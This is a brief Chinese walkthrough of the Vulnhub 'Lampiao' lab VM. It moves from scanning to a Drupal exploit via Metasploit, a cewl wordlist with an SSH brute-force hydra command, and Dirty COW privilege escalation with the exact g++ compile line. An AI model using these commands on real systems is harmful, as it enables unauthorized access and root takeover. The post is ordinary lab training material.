Vulnhub-----Lampiao
信息收集
arp扫到ip地址
再用nmap扫端口
80端口没啥东西
访问1898端口
可以发现是Drupal框架
漏洞利用
上MSF
用2018年的洞直接打
成功getshell
查看数据库配置文件
登录数据库没啥东西
应该也存在那个sql注入漏洞,我这边就不试了,之前做的DC-1也和这个差不多
查看/etc/passwd
发现tiago用户
老规矩 爆破ssh
这次学到一个新工具
脚本小子真香
cewl:通过爬行网站获取关键信息创建一个密码字典
cewl http://192.168.145.148:1898 -w password.txt
hydra -l tiago -P password.txt 192.168.1.127 ssh -V -t 5
成功登录
提权
对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权
kali是真香,脚本小子太快乐了
searchsploit dirty
用第三个
用法首先先将cpp文件提到当前目录
用python起个服务
python -m SimpleHTTPServer 5555
然后将cpp文件下载靶机上
g++编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
会生成一个二进制文件
运行即可拿到root密码
flag在root目录下